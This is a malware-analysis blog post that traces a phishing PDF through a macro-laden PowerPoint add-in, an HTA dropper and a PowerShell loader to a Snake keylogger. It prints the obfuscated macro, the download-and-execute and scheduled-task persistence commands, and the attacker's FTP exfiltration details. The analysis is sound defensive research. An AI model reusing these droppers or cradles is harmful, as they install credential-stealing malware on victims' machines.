Simple PDF Linking to Malicious Content
Last week, I found an interesting piece of phishing based on a PDF file. Today, most of the PDF files that are delivered to end-user are not malicious, I mean that they don’t contain an exploit to trigger a vulnerability and infect the victim’s computer. They are just used as a transport mechanism to deliver more malicious content. Yesterday, Didier analyzed the same kind of Word document[1]. They are more and more common because they are (usually) not blocked by common filters at the perimeter.
The PDF file (SHA256:f39408fee496216cf5f30764e6f259f71ea0ab4daa81f808f2958e8fca772d01) has a VT score of 1/58 and display a nice message:
The PDF is obfuscated in a classic way, all objects are embedded in an Object Stream:
remnux@remnux:/MalwareZoo/20220425$ pdfid.py f39408fee496216cf5f30764e6f259f71ea0ab4daa81f808f2958e8fca772d01.pdf -n
PDFiD 0.2.8 foo.pdf
PDF Header: %PDF-1.5
obj 25
endobj 25
stream 23
endstream 23
startxref 1
/ObjStm 1
/AcroForm 1
The file has a /URI keyword that points to the malicious URL:
remnux@remnux://MalwareZoo/20220425$ pdf-parser.py -O f39408fee496216cf5f30764e6f259f71ea0ab4daa81f808f2958e8fca772d01.pdf -k /URI /URI (hxxps://www[.]mediafire[.]com/file/fwxhm1vylsg3nl3/7.ppam/file)
To visit the malicious URL, the victim has to click on the picture displayed above, this is made in the PDF file via the /Annot object:
remnux@remnux://MalwareZoo/20220425$ pdf-parser.py -O f39408fee496216cf5f30764e6f259f71ea0ab4daa81f808f2958e8fca772d01.pdf -o 22
obj 22 0
Containing /ObjStm: 1 0
Type: /Annot
Referencing: 27 0 R, 28 0 R
<<
/Type /Annot
/Subtype /Link
/A 27 0 R
/Rect [1 0 613 791]
/BS 28 0 R
>>
remnux@remnux://MalwareZoo/20220425$ pdf-parser.py -O f39408fee496216cf5f30764e6f259f71ea0ab4daa81f808f2958e8fca772d01.pdf -o 27
obj 27 0
Containing /ObjStm: 1 0
Type: /Action
Referencing:
<<
/Type /Action
/S /URI
/URI (hxxps://www[.]mediafire[.]com/file/fwxhm1vylsg3nl3/7.ppam/file)
>>
When you visit the URL, you fill fetch a malicious PowerPoint file: 7.ppam (SHA256:2198abfdf736586893afe8e15153369299d3164e036920ff19c83043ba4ce54b) (VT score: 21/64)
remnux@remnux:/MalwareZoo/20220425$ zipdump.py 7.ppam
Index Filename Encrypted Timestamp
1 [Content_Types].xml 0 2022-04-06 13:56:56
2 _rels/.rels 0 1980-01-01 00:00:00
3 ppt/_rels/presentation.xml.rels 0 2022-04-06 13:57:10
4 ppt/presentation.xml 0 1980-01-01 00:00:00
5 ppt/slideLayouts/_rels/slideLayout5.xml.rels 0 1980-01-01 00:00:00
6 ppt/slideLayouts/_rels/slideLayout8.xml.rels 0 1980-01-01 00:00:00
7 ppt/slideLayouts/_rels/slideLayout9.xml.rels 0 1980-01-01 00:00:00
8 ppt/slideLayouts/_rels/slideLayout10.xml.rels 0 1980-01-01 00:00:00
9 ppt/slideLayouts/_rels/slideLayout11.xml.rels 0 1980-01-01 00:00:00
10 ppt/slideLayouts/_rels/slideLayout7.xml.rels 0 1980-01-01 00:00:00
11 ppt/slideLayouts/_rels/slideLayout6.xml.rels 0 1980-01-01 00:00:00
12 ppt/slideMasters/_rels/slideMaster1.xml.rels 0 1980-01-01 00:00:00
13 ppt/slideLayouts/_rels/slideLayout1.xml.rels 0 1980-01-01 00:00:00
14 ppt/slideLayouts/_rels/slideLayout2.xml.rels 0 1980-01-01 00:00:00
15 ppt/slideLayouts/_rels/slideLayout3.xml.rels 0 1980-01-01 00:00:00
16 ppt/slideLayouts/slideLayout11.xml 0 1980-01-01 00:00:00
17 ppt/slideLayouts/slideLayout10.xml 0 1980-01-01 00:00:00
18 ppt/slideLayouts/slideLayout9.xml 0 1980-01-01 00:00:00
19 ppt/slideMasters/slideMaster1.xml 0 1980-01-01 00:00:00
20 ppt/slideLayouts/slideLayout1.xml 0 1980-01-01 00:00:00
21 ppt/slideLayouts/slideLayout2.xml 0 1980-01-01 00:00:00
22 ppt/slideLayouts/slideLayout3.xml 0 1980-01-01 00:00:00
23 ppt/slideLayouts/slideLayout4.xml 0 1980-01-01 00:00:00
24 ppt/slideLayouts/slideLayout5.xml 0 1980-01-01 00:00:00
25 ppt/slideLayouts/slideLayout6.xml 0 1980-01-01 00:00:00
26 ppt/slideLayouts/slideLayout7.xml 0 1980-01-01 00:00:00
27 ppt/slideLayouts/slideLayout8.xml 0 1980-01-01 00:00:00
28 ppt/slideLayouts/_rels/slideLayout4.xml.rels 0 1980-01-01 00:00:00
29 ppt/theme/theme1.xml 0 1980-01-01 00:00:00
30 ppt/ksjksj.~text~TEXT~TEXT~ 0 1980-01-01 00:00:00
31 docProps/thumbnail.jpeg 0 2022-02-07 22:50:16
32 ppt/presProps.xml 0 1980-01-01 00:00:00
33 ppt/tableStyles.xml 0 1980-01-01 00:00:00
34 ppt/viewProps.xml 0 1980-01-01 00:00:00
35 docProps/app.xml 0 1980-01-01 00:00:00
36 docProps/core.xml 0 1980-01-01 00:00:00
The stream ID 30 looks the most interesting. It contains indeed a macro:
remnux@remnux:/MalwareZoo/20220425$ zipdump.py 7.ppam -s 30 -d | oledump.py 1: 516 'PROJECT' 2: 26 'PROJECTwm' 3: M 5457 'VBA/Module1' 4: 2463 'VBA/_VBA_PROJECT' 5: 529 'VBA/dir' remnux@remnux:/MalwareZoo/20220425$ zipdump.py 7.ppam -s 30 -d | oledump.py -s 3 -v Attribute VB_Name = "Module1" Sub Auto_Open() :::::: MsgBox "error! Re-install office":::::: Dim koaksdokasd As String:::::: koakosdk = "!@##!!@%^@^^n&&$%#g&&$%#tcar:":::::: koakosdk = Replace(koakosdk, "!@##!", "W"):::::: koakosdk = Replace(koakosdk, "!@%^@^^", "i"):::::: koakosdk = Replace(koakosdk, "car", "s"):::::: koakosdk = Replace(koakosdk, "&&$%#", "m"):::::: askjdjawjkdokawod = "askjdjawjkdokawod5nooo_Proce66":::::: askjdjawjkdokawod = Replace(askjdjawjkdokawod, "askjdjawjkdokawod", "W"):::::: askjdjawjkdokawod = Replace(askjdjawjkdokawod, "5", "i"):::::: askjdjawjkdokawod = Replace(askjdjawjkdokawod, "ooo", "32"):::::: askjdjawjkdokawod = Replace(askjdjawjkdokawod, "6", "s") :::::: koaksdokasd = "C:\Users\Public\update.js":::::: Close:::::: Open koaksdokasd For Output As #1:::::: Print #1, "function _0x2a39(_0x56d387,_0x4f348e){var _0x98da71=_0x98da();return _0x2a39=function(_0x2a392c,_0xb2ca10){_0x2a392c=_0x2a392c-0x19c;var _0x3d14a3=_0x98da71[_0x2a392c];return _0x3d14a3;},_0x2a39(_0x56d387,_0x4f348e);}function _0x98da(){var _0x4db6f6=['SpawnInstance_','30XpBDce','C:\x5cProgramData\x5cddond.com','2WjTghW','Win32_ProcessStartup','3551556ACfgms','CopyFile','1902954vylczN','Get','7dmvGMR','ShowWindow','155sBzhfb','winmgmts:','C:\x5cProgramData\x5cddond.com\x20hxxps://www[.]mediafire[.]com/file/d2oqymifkgxft56/7.htm/file','1058001GaUEEA','Create','24OTupMg','2802371DmNBod','146204AuCDSo','632050FwjRPn','3495483BWCpkS'];" :::::: Print #1, "_0x98da=function(){return _0x4db6f6;};return _0x98da();}var _0x550d40=_0x2a39;(function(_0x3935a0,_0x1de856){var _0x57a7a7=_0x2a39,_0xff11fe=_0x3935a0();while(!![]){try{var _0x2a1df1=-parseInt(_0x57a7a7(0x1a4))/0x1*(-parseInt(_0x57a7a7(0x19f))/0x2)+parseInt(_0x57a7a7(0x1af))/0x3+parseInt(_0x57a7a7(0x19e))/0x4*(-parseInt(_0x57a7a7(0x1ac))/0x5)+parseInt(_0x57a7a7(0x1a8))/0x6*(parseInt(_0x57a7a7(0x1aa))/0x7)+parseInt(_0x57a7a7(0x19c))/0x8*(parseInt(_0x57a7a7(0x1a0))/0x9)+parseInt(_0x57a7a7(0x1a2))/0xa*(-parseInt(_0x57a7a7(0x19d))/0xb)+parseInt(_0x57a7a7(0x1a6))/0xc;" :::::: Print #1, "if(_0x2a1df1===_0x1de856)break;else _0xff11fe['push'](_0xff11fe['shift']());}catch(_0x589b6a){_0xff11fe['push'](_0xff11fe['shift']());}}}(_0x98da,0xd3564),megamon=_0x550d40(0x1a3));var dihearter=new ActiveXObject('Scripting.FileSystemObject'),pit=dihearter[_0x550d40(0x1a7)]('C:\x5cWindows\x5cSystem32\x5cmshta.exe',megamon);KALYJA=_0x550d40(0x1ae);var w32ps=GetObject(_0x550d40(0x1ad))[_0x550d40(0x1a9)](_0x550d40(0x1a5));w32ps[_0x550d40(0x1a1)](),w32ps[_0x550d40(0x1ab)]=0x0;var rtrnCode=GetObject(_0x550d40(0x1ad))[_0x550d40(0x1a9)]('Win32_Process')[_0x550d40(0x1b0)](KALYJA,null,w32ps,null);":::::: Close::::::::::::::::::::::::::::::::::::: GetObject(koakosdk) _ . _ Get(askjdjawjkdokawod) _ . _ Create ("wscript C:\Users\Public\update.js") End Sub
No need to deobfuscate the macro completely, we see interesting strings (in red). The next payload is downloaded and then executed through mshta.exe.
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION ID="CS"
APPLICATIONNAME="Downloader"
WINDOWSTATE="minimize"
MAXIMIZEBUTTON="no"
MINIMIZEBUTTON="no"
CAPTION="no"
SHOWINTASKBAR="no">
<script>
chuchukukukaokiwDasidow = new ActiveXObject('Wscript.Shell');
kiii = "C:\\ProgramData\\ESETNONU.com";
var king = new ActiveXObject("Scripting.FileSystemObject");var pit = king.CopyFile ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Powershell.exe", k
iii);
cmd = "C:\\ProgramData\\ESETNONU.com -EP B -NoP -c i'e'x([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('hxxps://www[.]mediafire[.]com/file
/w2uuz1cy4cl2gup/7.dll/file').GetResponse().GetResponseStream()).ReadToend());";
var w32ps= GetObject('winmgmts:').Get('Win32_ProcessStartup');w32ps.SpawnInstance_();w32ps.ShowWindow=0;var rtrnCode=GetObject('winmgmts:').Get('Win32_
Process').Create(cmd,null,w32ps,null);
chuchukukukaokiwDasidow.Run('schtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr """%programdata%\\milon.com' + '""""""' + 'hxxps://www[.]mediafire[.]
com/file/3k4f9iglvljn9kt/7.htm/file"""',0);
megamon = "C:\\ProgramData\\milon.com";
var dihearter = new ActiveXObject("Scripting.FileSystemObject");var pit = dihearter.CopyFile ("C:\\Windows\\System32\\mshta.exe", megamon);
chuchukukukaokiwDasidow.Run("taskkill /f /im WinWord.exe",0);
chuchukukukaokiwDasidow.Run("taskkill /f /im Excel.exe",0);
chuchukukukaokiwDasidow.Run("taskkill /f /im POWERPNT.exe",0);
window.close();
</script>
</head>
<body>
</body>
</html>
You can see that the script implements persistence through a scheduled task and tries also to kill some processes. It fetches the next stage again from mediafire.com but it does not fetch a DLL. It's another script. It is a PowerShell script with some Base64 content:
remnux@remnux:/MalwareZoo/20220425$ base64dump.py 7.dll ID Size Encoded Decoded md5 decoded -- ---- ------- ------- ----------- 1: 4 Text M.m 3d0b353fa22a0001c9a7fda13f7c638e 2: 8 Encoding .w(v). 02b746b5b6358014a5294544d71a4dd7 3: 16 FromBase64String ..&.......). 4cfff9a87d891e1961d358c98991e469 4: 3560 QWRkLVR5cGUgLXR5 Add-Type -typede 0a9525d9ff1e87418c0b5c496546f889 5: 4 byte o+^ 50d0380b0362cc343a78fa4231fffe0f 6: 4 nona ... 8a773bb6add7d540b7c92c1ec8b22870 7: 4 Text M.m 3d0b353fa22a0001c9a7fda13f7c638e 8: 8 Encoding .w(v). 02b746b5b6358014a5294544d71a4dd7 9: 16 FromBase64String ..&.......). 4cfff9a87d891e1961d358c98991e469 10: 53872 W2J5dGVbXV0gJFNU [byte[]] $STRDYF adddffbf83acb22aaeccc45b897e99c3
The most interesting stream IDs look to be 4 and 10. Stream ID 4 contains the code to deobfuscate the second one. Let's check ID 10:
[byte[]] $STRDYFUGIHUYTYRTESRDYUGIRI =@(31,139,8,0,0,0,0,0,4,0,237,125,9,96,91,213,177,232,185,87,210,213,98,89,182,188,39,177,19,101,33,113,156,196,
... Stuff deleted ...
,169,182,152,105,157,58,250,129,8,15,178,241,99,153,24,104,242,117,245,190,185,254,7,175,109,194,239,216,213,150,255,179,21,249,230,250,103,92,255,7,238,182,245,33,0,108,0,0)
[byte[]] $RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH = Get-DecompressedByteArray $nona
[byte[]] $RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG =Get-DecompressedByteArray $STRDYFUGIHUYTYRTESRDYUGIRI
$FGCHJBKHVGCFHJVBKNBHVGJB = D4FD5C5B9266824C4EEFRWEOIURWDQWOIDUQW389C83E0C69FD3FAAG -TypeName 'System.Collections.ArrayList';
$FGCHJBKHVGCFHJVBKNBHVGJB.Add("W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRSRFNGR1RGSFlHVUpIS0dZRlREUlNSRFRGWUdKVUhLRERSVEZZRykuR2V0VHlwZSgncHJvakZVRC5QQScpLkdldE1ldGhvZCgnRXhlY3V0ZScpLkludm9rZSgkbnVsbCxbb2JqZWN0W11dICggJ0M6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxhc3BuZXRfcmVnYnJvd3NlcnMuZXhlJywkUlNFVERZVUdVSURSU1RSRFlVR0lIT1lSVFNFVFJUWURVR0lPSCkp")
$FGCHJBKHVGCFHJVBKNBHVGJBA = COMBINEMEANINGSCOBOLTPOTASSIUM($FGCHJBKHVGCFHJVBKNBHVGJB)
$RDTTFYGJHKUYGTFRYTFYGUHIJGYYGU = D4FD5C5B9266824C4EEFC83E0C69FD3FAA($FGCHJBKHVGCFHJVBKNBHVGJBA);try{$n=0;while($n -lt 3){&(GCM I*e-E*)($Run=($RDTTFYGJHKUYGTFRYTFYGUHIJGYYGU -Join ''));$n++}}catch{}
[Reflection.Assembly]::Load($RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG).GetType('projFUD.PA').GetMethod('Execute').Invoke($null,[object[]] ( 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe',$RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH))
The scripts dumps and executes a PE file (SHA256:039c261036b80fd500607279933c43c4f1c78fdba1b54a9edbc8217df49ec154) that is not present on VT at this time. I uploaded it on Malware Bazaar[4].
The first analysis reports it as a Snake keylogger:
{
"family": "snakekeylogger",
"rule": "SnakeKeylogger",
"credentials": [
{
"protocol": "ftp",
"host": "ftp://103[.]147[.]185[.]85/",
"port": 21,
"username": "bvhfgas7",
"password": "xxxxxxxx"
}
]
}
The malware seems active based on the collected data that I found:
remnux@remnux:/MalwareZoo/20220425$ ftp 103[.]147[.]185[.]85 Connected to 103[.]147[.]185[.]85. 220-FileZilla Server version 0.9.41 beta 220-written by Tim Kosse (Tim.Kosse@gmx.de) 220 Please visit http://sourceforge.net/projects/filezilla/ Name (103[.]147[.]185[.]85:root): bvhfgas7 331 Password required for bvhfgas7 Password: 230 Logged on Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -l 229 Entering Extended Passive Mode (|||65003|) 150 Connection accepted -rw-r--r-- 1 ftp ftp 316 Apr 05 02:06 AMAZING-AVOCADO - Passwords ID - ZyiAEnXWZP1101827263.txt -rw-r--r-- 1 ftp ftp 316 Apr 05 02:06 AMAZING-AVOCADO - Passwords ID - ZyiAEnXWZP1872355191.txt -rw-r--r-- 1 ftp ftp 293 Apr 24 22:06 AUVQQRRF - Passwords ID - ZyiAEnXWZP532723221.txt -rw-r--r-- 1 ftp ftp 292 Apr 05 19:53 CPJISPWT - Passwords ID - ZyiAEnXWZP1110184397.txt -rw-r--r-- 1 ftp ftp 292 Apr 05 19:55 CPJISPWT - Passwords ID - ZyiAEnXWZP1883154258.txt -rw-r--r-- 1 ftp ftp 292 Apr 05 19:52 CPJISPWT - Passwords ID - ZyiAEnXWZP2014006797.txt -rw-r--r-- 1 ftp ftp 292 Apr 05 19:53 CPJISPWT - Passwords ID - ZyiAEnXWZP2067984079.txt -rw-r--r-- 1 ftp ftp 292 Apr 05 19:53 CPJISPWT - Passwords ID - ZyiAEnXWZP384268998.txt -rw-r--r-- 1 ftp ftp 292 Apr 05 19:55 CPJISPWT - Passwords ID - ZyiAEnXWZP506198539.txt -rw-r--r-- 1 ftp ftp 292 Apr 05 19:55 CPJISPWT - Passwords ID - ZyiAEnXWZP573982685.txt -rw-r--r-- 1 ftp ftp 292 Apr 05 19:52 CPJISPWT - Passwords ID - ZyiAEnXWZP637051078.txt -rw-r--r-- 1 ftp ftp 292 Apr 05 19:53 CPJISPWT - Passwords ID - ZyiAEnXWZP878300114.txt -rw-r--r-- 1 ftp ftp 301 Apr 06 04:56 DESKTOP-D019GDM - Passwords ID - ZyiAEnXWZP1360583859.txt -rw-r--r-- 1 ftp ftp 301 Apr 06 04:56 DESKTOP-D019GDM - Passwords ID - ZyiAEnXWZP1592468142.txt -rw-r--r-- 1 ftp ftp 301 Apr 06 04:56 DESKTOP-D019GDM - Passwords ID - ZyiAEnXWZP1711955750.txt -rw-r--r-- 1 ftp ftp 301 Apr 06 04:56 DESKTOP-D019GDM - Passwords ID - ZyiAEnXWZP1868796841.txt -rw-r--r-- 1 ftp ftp 300 Apr 04 23:18 DESKTOP-D019GDM - Passwords ID - ZyiAEnXWZP609212224.txt -rw-r--r-- 1 ftp ftp 293 Apr 24 22:06 JVJHUWZP - Passwords ID - ZyiAEnXWZP1117034868.txt -rw-r--r-- 1 ftp ftp 38 Mar 29 20:43 Snake Keylogger - YrTVKTaWocPKgCyA - 222139415.txt -rw-r--r-- 1 ftp ftp 293 Apr 24 22:11 WIN7X64 - Passwords ID - ZyiAEnXWZP1161416015.txt 226 Transfer OK
[1] https://isc.sans.edu/forums/diary/Analyzing+a+Phishing+Word+Document/28562/
[2] https://www.virustotal.com/gui/file/f39408fee496216cf5f30764e6f259f71ea0ab4daa81f808f2958e8fca772d01
[3] https://www.virustotal.com/gui/file/2198abfdf736586893afe8e15153369299d3164e036920ff19c83043ba4ce54b
[4] https://bazaar.abuse.ch/sample/039c261036b80fd500607279933c43c4f1c78fdba1b54a9edbc8217df49ec154/
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
ISC Stormcast For Monday, April 25th, 2022 https://isc.sans.edu/podcastdetail.html?id=7978
×
![modal content]()
Diary Archives
Comments
Anonymous
Dec 3rd 2022
10 months ago
Anonymous
Dec 3rd 2022
10 months ago
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.
<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
Anonymous
Dec 26th 2022
9 months ago
Anonymous
Dec 26th 2022
9 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
9 months ago
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> nearest public toilet to me</a>
<a hreaf="https://defineprogramming.com/the-public-bathroom-near-me-find-nearest-public-toilet/"> public bathroom near me</a>
Anonymous
Dec 26th 2022
9 months ago
Anonymous
Dec 26th 2022
9 months ago
https://defineprogramming.com/
Dec 26th 2022
9 months ago
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
https://clickercounter.org/
https://defineprogramming.com/
Dec 26th 2022
9 months ago
rthrth
Jan 2nd 2023
9 months ago